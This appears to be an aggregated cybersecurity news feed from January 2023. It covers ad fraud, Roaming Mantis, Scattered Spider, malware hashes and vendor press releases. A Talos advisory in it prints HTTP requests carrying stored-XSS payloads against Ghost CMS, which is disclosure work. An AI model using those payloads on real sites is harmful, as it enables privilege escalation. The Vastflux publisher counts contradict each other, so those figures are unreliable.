Mainly Apple iOS in-app ads were targeted, injecting malicious JavaScript code to rack up phony views.

A sprawling new adware campaign that abused the Vast video ad server template to rack up fraudulent digital advertising views on an enormous scale has been shut down.

At its peak, the adware effort hit more than 12 billion requests per day.

Human Security's Satori threat intelligence team uncovered the adware campaign, touting it as the largest find in the cybersecurity research group's history. Following the discovery, Satori said it led a takedown of the ad fraud operation, which they dubbed as Vastflux.

The team added in its report that, in all, Vastflux spoofed more than 1,700 apps, targeted 1,200 publishers, and displayed ads on applications running on about 11 million devices.

"What was technically impressive and incredibly concerning about Vastflux \[were\] the fraudsters hijacked impressions on legitimate apps, which makes it nearly impossible for users to tell if they are impacted," Gavin Reid, Human's CISO, said.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Massive Adware Campaign Shuttered

Talent retention and institutional knowledge go hand in hand. Both are critical to ensuring the security of your network environment.

Thursday, January 19, 2023 16:01

Welcome to this week’s edition of the Threat Source newsletter.

Talent retention and institutional knowledge go hand in hand. Both are critical to ensuring the security of your network environment. To that end, I want to talk briefly about why talent retention isn’t just about money. So I am going to speak directly to the people managers from the team leads in the SOC to the C-Level execs. When you examine what you do on a day-to-day basis are you telling your team members what they can and can’t do? How often do the things you say and the goals you provide fall between those two things? Now, ask yourself what you’ve done to enable them to grow today, both technically and as people. One of the easiest ways to very quickly identify quality leadership is to find out if the mindset and actions of the people managers is that the employees work for and reflect on them, or if they understand that they work for the team and that the team is a reflection of their leadership. Yes, there are plenty of employees that will leave simply based on pay, and we all have budgets to work within – but there is no cost to show respect and fighting to find budget for pet projects, training, or even niche learning for your employees is your job. When you can’t find budget find other ways to show the employees that you respect them and are actively working to ensure their growth. In the end your efforts will be rewarded with a stronger team and a more secure environment.

**The one big thing**

Focus on the basics. As we run headlong into the impending brick wall of 2023 take a moment to look at your environment and simply relearn it.

**Why do I care?**

Without knowing your baseline environment there is absolutely no way that you can expect to protect it.

**So now what?**

Learn your network. Observe and reevaluate your physical security standards in this crazy post pandemic world. Ensure that your patch management strategy is sound and that you have good cross-team collaboration to get those change windows handled. Ensure dead accounts are handled correctly. On and on – you know the steps. Take a beat and follow them.

**Top security headlines of the week**

Yum Brands, the parent company of fast-food chains KFC, Pizza Hut and Taco Bell, has confirmed that company data was stolen in a ransomware attack.

Yum Brands said a ransomware attack impacted “certain information technology systems,” prompting the chain to take some of its systems offline. The incident also led to the closure of roughly 300 restaurants in the United Kingdom for 24 hours, the company said. Although the ransomware attack largely affected the company’s U.K. operations, Yum Brands said it notified U.S. federal law enforcement as its investigation continues. (Tech Crunch and Yum)

Initial Access Broker market is booming, posing growing threat to enterprises. Research shows a sharp year-over-year growth in the number of IABs operating in underground forums and markets. For ransomware operators and other cybercriminals that are looking for quick access to enterprise networks, these brokers are the answer. (Dark Reading and GroupIB)

**Can’t get enough Talos?**

*   https://blog.talosintelligence.com/following-the-lnk-metadata-trail/
*   https://blog.talosintelligence.com/talos-year-in-review-2022/
*   https://talosintelligence.com/podcasts/shows/beers\_with\_talos
*   https://talostakes.talosintelligence.com/2018149/12016411-year-in-review-apt-summary-edition

**Upcoming events where you can find Talos**

CactusCon (Jan 27-28)  
Mesa, AZ

Cisco Live Amsterdam (Feb 6-10)  
Amsterdam, Netherlands

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256:  
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Detection Name: Simple\_Custom\_Detection

SHA 256:  
1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d  
MD5: 26f927fb7560c11e509f0b8a7e787f79  
Typical Filename: Iris QuickLinks.exe  
Claimed Product: N/A  
Detection Name: W32.File.MalParent

SHA 256:

125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
MD5: 2c8ea737a232fd03ab80db672d50a17a  
Typical Filename: LwssPlayer.scr  
Claimed Product: 梦想之巅幻灯播放器  
Detection Name: Auto.125E12.241442.in02

SHA256:  
e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

Threat Source newsletter (Jan. 19, 2023): Talent retention and institutional knowledge

By Waqas
The ad fraud was discovered while the researchers were investigating an iOS application that had been heavily impacted by an app spoofing attack.
This is a post from HackRead.com Read the original post: Massive Ad Fraud Scheme Shut Down: 11 Million Phones Targeted

Dubbed VASTFLUX, the ad fraud had 1,700 apps spoofed, targeting 120 publishers on 11 million devices with 12 billion ad requests per day.

The cybersecurity researchers at HUMAN Security Inc. have announced the takedown of a sophisticated, organized, and large-scale ad fraud operation dubbed VASTFLUX.

HUMAN Security is among the world’s leading firms offering advanced defences against digital attacks. Previously, the company reported large-scale scams involving iOS and Android devices, such as **Scylla**, **PARETO**, **Methbot,** and **3ve**.

VASTFLUX is a combination of two terms that reflect its functionality. VAST represents the Digital Video Ad Serving Template exploited in this operation. The name Flux is inspired by the Fast Flux concept, which is an evasion tactic used by cybercriminals.

Team Satori from HUMAN discovered the operation when investigating an iOS application, which was heavily impacted by an **app spoofing attack**.

The researchers found it a highly sophisticated scheme in which cybercriminals exploited the limited signal available to the verification partners in their targeted environment, including in-app advertising mainly on iOS.

The ad fraud later evolved into spoofing bids on a particular platform to make them appear on another platform. This made cross-platform attacks impossible to deter. HUMAN worked with its partners in the HUMAN Collective to obtain further information into the fraud’s traffic volumes and verification tags used on their ads.

The team deployed three mitigation methods within two weeks to protect users from VASTFLUX before taking it down.

**Targeted Entities**

According to a **blog post** shared by HUMAN with Hackread.com, the fraudulent operation accounted for over 12 billion fake ad requests per day and affected around 11 million devices by running ads within apps. For this purpose, the perpetrators spoofed 1,700 apps targeting around 10 publishers.

This is HUMAN’s Satori Threat Intelligence and Research Team’s highest per day volume of an operation uncovered by this team. It even eclipsed Human’s previously discovered peak volumes in high-profile disruptions. This includes PARETO, Methbot, and 3ve.

**How Did the Attack Work?**

The attackers injected malicious **JavaScript code into digital ads**, which let fraudsters stack dozens of video ads upon each other and register views for ads that the user couldn’t see. HUMAN shut down this operation via a private takedown effort and protected the programming advertising ecosystem. However, the company is still monitoring its operations.

Malicious JS code (Credit: Satori Threat Intelligence and Research Team)

The company’s CISO, Gavin Reid, stated that VASTFLUX was a “technically impressive and incredibly concerning” operation because the fraudsters hijacked impressions of authentic apps, making it difficult for users to feel suspicious.

“Orchestrating a private takedown of this magnitude and severity is no small feat, and I want to take a moment to thank all involved, including the HUMAN Satori Threat Intelligence and Research Team, the team at clean.io and the industry leaders who make up The HUMAN Collective who are dedicated to making the programmatic ecosystem safe and HUMAN,” Reid said.

1.  Shazam flaw exposed location of Android, iOS users
2.  SolarWinds hackers exploited 0-day to hack iPhones
3.  European Spyware Vendor selling iOS Device Exploits
4.  Malicious SDK spying, defrauding users with iOS apps
5.  Facebook removes accounts for spreading iOS malware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Massive Ad Fraud Scheme Shut Down: 11 Million Phones Targeted

**Woburn, MA – January 19, 2023 –** Today Kaspersky researchers reported on a new domain name system (DNS) changer functionality used in the infamous Roaming Mantis campaign. Cybercriminals have demonstrated they can use compromised public Wi-Fi routers to try to infect more Android smartphones with the campaign’s Wroba.o malware. Attackers used the new technique against users in South Korea, but it could be soon implemented in other countries as well. 

Roaming Mantis (a.k.a Shaoye) is a cybercriminal campaign first observed by Kaspersky in 2018. It uses malicious Android package (APK) files to control infected Android devices and steal device information. It also has a phishing option for iOS devices and cryptomining capabilities for PCs. The name of the campaign is based on its propagation via smartphones roaming between Wi-Fi networks, potentially carrying and spreading the infection.

**New DNS changer functionality to attack more users via public routers**

Kaspersky discovered that Roaming Mantis recently introduced a domain name system (DNS) changer functionality in Wroba.o (a.k.a Agent.eq, Moqhao, XLoader), the malware that was primarily used in the campaign. DNS changer is a malicious program that directs the device connected to a compromised Wi-Fi router to a server under the control of cybercriminals instead of a legitimate DNS server. On the malicious landing page, the potential victim is prompted to download malware that can control the device or steal credentials.

At the moment, the threat actor behind Roaming Mantis is exclusively targeting routers located in South Korea and manufactured by a very popular South Korean network equipment vendor. To identify them, the new DNS changer functionality gets the router’s IP address and checks the router’s model, compromising targeted ones by overwriting the DNS settings. In December 2022, Kaspersky observed 508 malicious APK downloads in the country (see the Table 1). 

An investigation of malicious landing pages found that attackers are also targeting other regions using smishing instead of DNS changers. This technique employs text messages to spread malicious links that direct the victim to a malicious site to download malware onto the device or steal user info via a phishing website. Japan topped the list of targeted countries with nearly 25,000 malicious APK downloads from the landings created by cybercriminals. Austria and France followed with roughly 7,000 downloads each. Germany, Turkey, Malaysia and India rounded out the list. Kaspersky researchers predict that the perpetrators may soon update the DNS changer function to target Wi-Fi routers in those regions as well. 

**Country**  

**Number of downloaded malicious APK** 

Japan

24,645

Austria

7,354

France

7,246

Germany

5,827

South Korea

508

Turkey

381

Malaysia

154

India

28

_Table 1. The number of malicious APK downloads per country based on investigation of malicious landing pages created within Roaming Mantis campaign, the first half of December 2022_

According to Kaspersky Security Network (KSN) statistics in September – December 2022, the highest detection rate of Wroba.o malware (Trojan-Dropper.AndroidOS.Wroba.o) was in France (54.4%), Japan (12.1%) and the U.S. (10.1%). 

“When an infected smartphone connects to ‘healthy’ routers in various public places like cafes, bars, libraries, hotels, shopping malls, airports, or even homes, Wroba.o malware can compromise these routers and affect other connected devices as well,” said Suguru Ishimaru, senior security researcher at Kaspersky. “The new DNS changer functionality can manage all device communications using the compromised Wi-Fi router, such as redirecting to malicious hosts and disabling updates of security products. We believe that this discovery is highly critical for the cybersecurity of Android devices because it is capable of being widely spread in the targeted regions.” 

To read the full report on newly implemented DNS changer functionality, please visit Securelist.com.

In order to protect your internet connection from this infection, Kaspersky researchers recommend the following:

*   Refer to your router’s user manual to verify that your DNS settings haven’t been tampered with or contact your ISP for support.

*   Change the default login and password for the admin web interface of the router and regularly update your router’s firmware from the official source.

*   Never install router firmware from third party sources. Avoid using third-party repositories for your Android devices.

*   Further, always check browser and website addresses to ensure they are legitimate; look for signs such as https when asked to enter data.

*   Consider installing a mobile security solution, such as Kaspersky, to protect your devices from these and other threats.

**About Kaspersky**

Kaspersky is a global cybersecurity and digital privacy company founded in 1997. Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative security solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection and a number of specialized security solutions and services to fight sophisticated and evolving digital threats. Over 400 million users are protected by Kaspersky technologies and we help 240,000 corporate clients protect what matters most to them. Learn more at usa.kaspersky.com.

Roaming Mantis Uses DNS Changers to Target Users via Compromised Public Routers

An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `codeinjection_foot` for a post.

**SUMMARY**

An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ghost Foundation Ghost 5.9.4

**PRODUCT URLS**

Ghost - http://www.ghost.org

**CVSSv3 SCORE**

9.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**CWE**

CWE-453 - Insecure Default Variable Initialization

**DETAILS**

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

Ghost CMS separates users into four groups (five, if including the site owner) of increasing privilege: Contributor, Author, Editor and Administrator. Contributor users have the least privilege and are allowed to create but not publish posts. All users have the ability to include social media links, as well as a few other pieces of information that will be included on their posts and author pages. A stored XSS vulnerability exists in a number of these fields, and it can be leveraged from basic user attacks to full privilege escalation. As with any XSS, it does require a target user with the correct access level to access affected resources while logged in to trigger the injected Javascript. The vulnerabilities listed here can be triggered when a higher level user simply previews or visits any post by the malicious user, as these social links seems to be included in all of a user’s posts. We have confirmed that a full privilege escalation to administrator can be achieved with the correct Javascript payload.

Separating the admin domain as documented at https://ghost.org/docs/config/#admin-url will prevent this type of vulnerability from being exploited to perform privileged API calls, such as modifying a user group, adding users, etc. However, in default installations, these vulnerabilities can be used for privilege escalation via XSS. Essentially this means that, in default installations of Ghost CMS, users that can author pages and administrator users have the same privileges.

**CVE-2022-47194 - Twitter**

A stored XSS vulnerability exists in the twitter field for a user.

    PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 104
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"users":[{"twitter":"</script><script>alert('XSS')</script>"}]}
    

**CVE-2022-47195 - Facebook**

A stored XSS vulnerability exists in the facebook field for a user:

    PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 69
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"users":[{"facebook":"</script><script>alert('XSS')</script>"}]}
    

**CVE-2022-47196 - codeinjection\_head**

A stored XSS vulnerability exists in the codeinjection\_head for a post:

    POST /ghost/api/admin/posts/ HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 144
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"posts":[{"title":"My Test Post",
    "codeinjection_head":"<iframe onload=\"alert('XSS')\" />",
    "authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}
    

**CVE-2022-47197 - codeinjection\_foot**

A stored XSS vulnerability exists in the codeinjection\_foot for a post:

    POST /ghost/api/admin/posts/ HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 172
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"posts":[{"title":"My Test Post",
    "codeinjection_head":null,
    "codeinjection_foot":"<iframe onload=\"alert('XSS')\" />",
    "authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}
    

**TIMELINE**

2022-10-26 - Initial Vendor Contact

2022-10-26 - Vendor Disclosure

2022-10-31 - Vendor doesn’t consider issue a security problem

2022-11-22 - Vendor still doesn’t consider the issue a security problem

2023-01-05 - Revised advisory sent to vendor

2023-01-12 - Vendor still doesn’t see issue as security issue

2023-01-19 - Public release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-47197: TALOS-2022-1686 || Cisco Talos Intelligence Group

New program enables students and early career professionals to learn critical skills required in today's entry-level cybersecurity field, helping address urgent cyber workforce jobs gap.

**ALBUQUERQUE, N.M. and LANHAM, Md., Jan. 19, 2023 /PRNewswire/ --** The International Council of E-Commerce Consultants (EC-Council), a developer of world-class cybersecurity education programs and certifications, today announced that it has partnered with edX, a leading global online learning platform from 2U, Inc. (Nasdaq: TWOU), and committed to expanding access to vital cybersecurity education programs. EC-Council's Essentials Series is the first cybersecurity Professional Certificate of its kind to be offered on edX and includes three foundational industry certification credentials. The beginner level series is designed for learners aspiring to pursue a career in cybersecurity.

"The Essentials Series is purpose-built to help educate up-and-coming cybersecurity professionals and enable them to begin their careers," said Bill Kiriakis, Senior Vice President and Head of North America at EC-Council. "edX is a leader in online learning, bringing courses and certifications to over 46 million learners worldwide. With this new offering, edX and EC-Council can directly help address the global shortage of cybersecurity workers."

EC-Council's Essentials Series includes three individual courses covering network defense, ethical hacking, and digital forensics and costs $447 USDfor the full lab range and certification bundles. The series helps students and early career professionals learn employable skills required in today's entry-level cybersecurity field, educating students in a range of techniques and tactics across industry verticals, such as securing networks, mitigating cyber risks, conducting forensic investigations, ethical hacking, attack vectors, and more.

Cybersecurity continues to be one of the most in-demand professions. According to industry sources, there are now close to 4 million open cyber jobs worldwide and half a million open positions in the US. The industry is struggling to find and retain talent, partially due to access to training and certification programs.

"edX's professional certificate programs are designed to enhance the critical skills needed to succeed in today's most in-demand fields. They drive true career impact in an accessible and affordable way," said Andrew Hermalyn, president of partnerships at edX. "The addition of EC-Council's cybersecurity Essentials Series on edX gives learners the opportunity to earn a valuable credential from a world-class cybersecurity organization."

For more information on EC-Council's programs on edX, visit edx.org/school/ec-council.

**About EC-Council**

The sole mission of EC-Council is to advance the state of the cybersecurity profession on a global scale. Helping organizations, educators, governments, and individuals address global workforce problems is at the heart of the company's mission. To this end, it is developing and curating world-class cybersecurity education programs and certifications. It is also providing cybersecurity services to some of the largest businesses all over the world. More than 2,000 best universities, colleges, and training companies put their faith in EC-Council. This includes seven Fortune 10 companies, 47 Fortune 100 companies, the Department of Defense, global intelligence communities, and NATO. The standards for cybersecurity education are set by EC-Council programs, which have now been implemented in more than 140 countries worldwide. To acquire additional knowledge, please go to https://www.eccouncil.org/.

**About edX**

edX is the global online learning platform that exists to help learners everywhere unlock their potential. edX was founded by Harvard and MIT in 2012 to make the world's best education available to everyone. Today, as a 2U, Inc. company (Nasdaq: TWOU), edX connects over 46 million ambitious learners with the skills, knowledge, and support to achieve their goals. Together with the world's leading universities and companies, edX offers thousands of free and open courses, professional certificates, boot camps, credit-bearing micro credentials, and undergraduate and graduate degrees. Discover purpose-built online programs in technology, business, healthcare, science, education, social work, sustainability, and more at edX.org.

International Council of E-Commerce Consultants Launches Cybersecurity Essentials Professional Certificate Program on edX

**BOSTON****,** **Jan. 19, 2023** **/PRNewswire/ --** Mendix, a Siemens business and global leader in modern enterprise application development, and Software Improvement Group (SIG), an independent technology and advisory firm for software quality, security and improvement, have announced the release of Mendix Quality & Security Management (QSM), a new cybersecurity solution that provides continuous deep-dive insights into security and code quality to immediately address risks and vulnerabilities. The introduction of Mendix QSM enables enterprises to fuel innovation and growth, while managing cyber risks and building future-fit software.

The Mendix low-code development platform enables companies to accelerate the delivery of new innovations. Succeeding the Mendix Application Quality Monitor (AQM), the new Mendix QSM solution provides IT management, quality assurance teams, and software security experts deep visibility across the entire portfolio of Mendix applications. This enables close control of the software development process without compromising the quality and security of software, ensuring that security oversight is always top of mind for customers.

Mendix QSM is powered by Sigrid®, SIG's software assurance guiding platform. Combining more than 20 best-of-class security scanning tools, it provides a comprehensive overview of how security findings impact business objectives. With Mendix QSM, Mendix clients can scan their Mendix applications, including third-party libraries, for vulnerabilities and incorrectly configured security models, rank for compliance with main industry standards such as OWASP, ISO 5055 and PCI, and receive recommendations and clear guidance on risk mitigation.

Mendix QSM is based on static analysis of application models. Mendix models have been mapped to the ISO 25010 Maintainability model by SIG experts based on the Mendix model metadata. This allows for benchmarking of Mendix applications against a database of thousands of projects, including open-source initiatives. Mendix QSM also presents a five-star rating of the software quality. For example, a four-star software rating means issues are resolved three times faster, throughput increases seven-fold, and productivity increases almost 11-fold compared to a two-star rating.

"Mendix and SIG have been Original Equipment Manufacturer (OEM) partners since 2016," said Hans de Visser, chief product officer at Mendix. "In the past six years, we have strived to empower our customers with fast software development and best-of-industry governance tooling to build future-proof applications. Security is top of mind for our customers, and the new cybersecurity capabilities in Mendix Quality & Security Management is a logical extension to cater to the increasing security demands and requirements of our customers. Mendix and SIG expanded the OEM partnership to help Mendix customers manage the quality of their applications proactively, ensuring faster issue resolution with higher technical quality of software."

Luc Brandts, group CEO at SIG_,_ said, "With the number of cyber attacks growing every day, it is crucial for organizations worldwide to manage the build quality and security of their IT landscapes in a continuous fashion. We are providing this service as part of our quality assurance commitment to our customers. This new and improved joint security solution offers Mendix clients from bit to boardroom the transparency and continuous security insights they require in order to build business-ready applications with total confidence."

SIG inspects and certifies thousands of software systems per year on technical quality according to ISO/IEC 25010 and will continue to add new scanning tools and rules to QSM as part of its ongoing service.

**Connect with Mendix**

*   Follow @Mendix on Twitter
*   Connect with Mendix on LinkedIn

**About Mendix**

In a digital-first world, customers want their every need anticipated, employees want better tools to do their jobs, and enterprises know that sweeping digital transformation is the key to survival and success. Mendix, the low-code engine of the Siemens Xcelerator platform, is quickly becoming the application development platform of choice to drive the enterprise digital landscape. Mendix's industry-leading low-code platform, dedicated partner network, and extensive marketplace support advanced technology solutions that boost engagement, streamline operations, and relieve IT logjams. Built on the pillars of abstraction, automation, cloud, and collaboration, Mendix dramatically increases developer productivity and engages business technologists to create apps guided by their particular domain expertise. Mendix empowers enterprises to build apps faster than ever; catalyzes meaningful collaboration between IT and business experts; and maintains IT control of the entire application landscape. Consistently recognized as a leader and visionary by leading industry analysts, the platform is cloud-native, open, extensible, agile, and proven. From artificial intelligence and augmented reality to intelligent automation and native mobile, Mendix and Siemens Xcelerator are the backbone of digital-first enterprises. The Mendix low-code platform is used by more than 4,000 companies worldwide, over 200,000 applications have already been realized, and the active community comprises more than 300,000 developers.

**About SIG**

Software Improvement Group (SIG) guides business and technology leaders to drive their organizational objectives by fundamentally improving the health and security of their software applications. SIG offers Sigrid® - the software assurance guiding platform - to partners and enterprise organizations to help them measure, evaluate and improve code quality.SIG has the world's largest software benchmark with more than 75 billion lines of code across more than 300 technologies. The SIG laboratory has been accredited according to ISO/IEC 17025 for software quality analysis. Founded in 2000, SIG is headquartered in Amsterdam with regional offices in New York, Frankfurt, Brussels, and Copenhagen.

More information: www.softwareimprovementgroup.com

Mendix and Software Improvement Group Launch a New Software Application Quality and Security Scanning Solution

The growing use of mobile devices for MFA and the proliferation of 5G and VoIP in general could result in more attacks in future, experts say.

The growing use of mobile devices for multifactor authentication increasingly has made telecom providers a juicy target for cybercrime. An ongoing SIM card-swapping campaign by a Chinese threat actor called "Scattered Spider" is just the latest example of that trend.

Scattered Spider is an APT group that researchers from CrowdStrike have been tracking for the past several months. The group has been targeting telecom companies and business-process outsourcing (BPO) firms that support these telecom companies with the objective of gaining access to their respective carrier networks.

**SIM-Jacking Via the Carrier Network**

In at least two instances where the threat actor gained that access, they used it to do SIM swapping, a process where an adversary essentially transfers another person's phone number to their SIM card. Attackers can then use the hijacked phone number to access bank accounts or any other account where the legitimate user might have registered the phone as a second form of authentication. SIM jacking also gives attackers a way to register and associate rogue devices to accounts on compromised networks.

Bud Broomhead, CEO at Viakoo, says the wide use of mobile networks for multifactor authentication has painted a big target on telecom providers. "While there have always been efforts to breach telecom systems, the increased reliance on them for security has increased the frequency of attacks against them," he says.

In the campaigns that CrowdStrike observed, Scattered Spider gained initial access to a targeted telecom or BPO network by impersonating IT personnel and convincing individuals working at these organizations to part with their credentials or to grant remote access to their computers. Once inside the target environment the threat actors moved laterally across it — often using legitimate tools such as Windows Management Instrumentation — till they gained access to the carrier network.

The group has targeted multiple telecom firms since at least June 2022 and has simply kept moving to different targets each time it gets booted from one, prompting CrowdStrike to describe the campaign as an "extremely persistent and brazen" threat. Recently, CrowdStrike observed Scattered Spider deploy a malicious kernel driver via a vulnerability exploit as part of its attack chain.

Adam Meyers, senior vice president of intelligence at CrowdStrike, says Scattered Spider's campaign appears to be financially motivated and therefore different from the many attacks on carrier networks focused on cyber espionage.

"Based on what we have seen, they are focused on SIM swapping," Meyers says. "When you have two factor-authentication and do a SIM swap, you can bypass that authentication."

**Crime v. Espionage**

Campaigns like Scattered Spider represent a relatively new kind of attack on carrier networks. In recent years, many campaigns that targeted telecom companies have focused on some form of intelligence-gathering activity and have often involved advanced persistent threat groups from countries such as China, Iran, and Turkey, Meyers notes. The goal usually is to intercept communications and to harvest the detailed information available in call data records (CDRs), he says. CDRs can be very powerful for monitoring and tracking individuals, he says.

Back in 2019, Cybereason reported on one such campaign that it dubbed Operation Soft Cell, where a Chinese APT group infiltrated carrier networks belonging to a major telecommunication company to steal CDRs. The security vendor assessed at the time that the campaign had been active since at least 2012, giving the threat actor access to data that would have helped the government target politicians, foreign intelligence agencies, dissidents, law enforcement, and others.

In 2021, CrowdStrike reported on a multi-year campaign where a threat actor called Light Basin broke into at least 13 telecom networks worldwide and systematically stole Mobile Subscriber Identity (IMSI) data and call metadata on users. The threat actor installed tools on the carrier networks that allowed it to intercept call and text messages, call information, and records for tracking and monitoring targeted individuals.

More recently, Bitdefender reported observing a Chinese threat actor targeting a telecom firm in the Middle East in a cyber-espionage campaign. "The attack carries the hallmarks of BackdoorDiplomacy, a known APT group with ties to China," says Danny O’Neill, director of MDR operations at Bitdefender. The initial compromise used binaries vulnerable to side-loading techniques and likely involved an exploit of the ProxyShell vulnerability in Microsoft Exchange Server, he says.

"Once inside, the APT used multiple tools — some legit and some custom — and malware to spy, move laterally across the environment, and evade detection," he says.

**Catalysts for More Attacks?**

Meyers and others expect that the proliferation of 5G networks and VoIP services in general in coming years will make it easier for threat actors to execute these attacks on telecommunication companies. Newer telecom services such as 5G are susceptible to cyberattacks because everything — including the core networks — are software designed, O'Neill says. That means all the risks associated with software technologies will manifest on carrier networks as well, he says.

"There are going to be a greater number of cells, pico-cells, and micro-cells required to deliver the coverage given the much higher operating frequencies of 5G," O'Neill points out. From an attacker's perspective, this equates to more access and entry points, he says.

"The almost universal adoption of voice over IP technology has made pretty much every network a data network and blurred the lines between mediums," says Mike Parkin, senior technical engineer at Vulcan Cyber. "It's hard to separate old school voice telecommunication from today’s data networks," he says.

**Why Disruptive Cyberattacks Remain Rare**

One notable aspect of attacks on carrier networks is that very few so far have involved attempts to cause widespread service outages or sabotage — a major concern with attacks on organizations in other critical infrastructure sectors. In its 2019 report, Cybereason in fact had noted how the attackers could have used their access on the telecom network to do pretty much anything they had wanted: "A threat actor with total access to a telecommunications provider, as is the case here, can attack however they want passively and also actively work to sabotage the network."

That is an assessment that Meyers shares about the Scattered Spider campaign as well.

One reason why disruptive cyberattacks on telecom infrastructure might not have happened so far is because they are really not necessary.

"The primary motivation for attacks on signal-carrying networks is espionage," says John Bambenek, principal threat hunter at Netenrich. "Certainly, there are sabotage interests, but those are usually correlated to the proximity of physical conflict." As an example, he points to Russian attacks on Ukraine's telecom infrastructure at the start of the war.

Pulling off a disruptive cyberattack on a telecom network often is not needed because other, more straightforward options are available. "What we see many examples of is disruption due to physical means. Getting a little out of hand with a backhoe in the wrong place has disrupted communications for entire metropolitan areas," he says.

The shift to VoIP means old school tactics such as DDoS attacks could soon become an effective way to disrupt a carrier network, adds Parkin. Even so, other methods are easier, he says.

"A crowbar can gain access to a wiring trunk, and a pair of bolt cutters can make short work of the cables inside," Parkin says. "Taking out wireless communications takes more sophisticated equipment, but a couple of signal jammers could take down a surprisingly large area."

**Regs to the Rescue**

Going forward, governments and regulatory bodies will have to take a more active role in ensuring the security of the telecom sector against cyberattacks. Parkin points to recent steps by the US, UK, and other governments to mitigate against perceived "high risk" vendors and equipment manufacturers that sit at the core of telco networks as an example of what's needed in future.

"Government influence in achieving end-to-end cybersecurity should focus foremost on governance and regulatory requirements," O'Neill notes. "Existing policies and standards need to be developed and strengthened to incorporate new services like 5G."

He fears that operators, if left unchecked, could default to focusing on availability and convenience at the expense of security.

Cybercriminals Target Telecom Provider Networks

Cybercriminals are increasingly leveraging malicious LNK files as an initial access method to download and execute payloads such as Bumblebee, IcedID, and Qakbot.
A recent study by cybersecurity experts has shown that it is possible to identify relationships between different threat actors by analyzing the metadata of malicious LNK files, uncovering information such as the specific tools and

Threat Intelligence / Malware

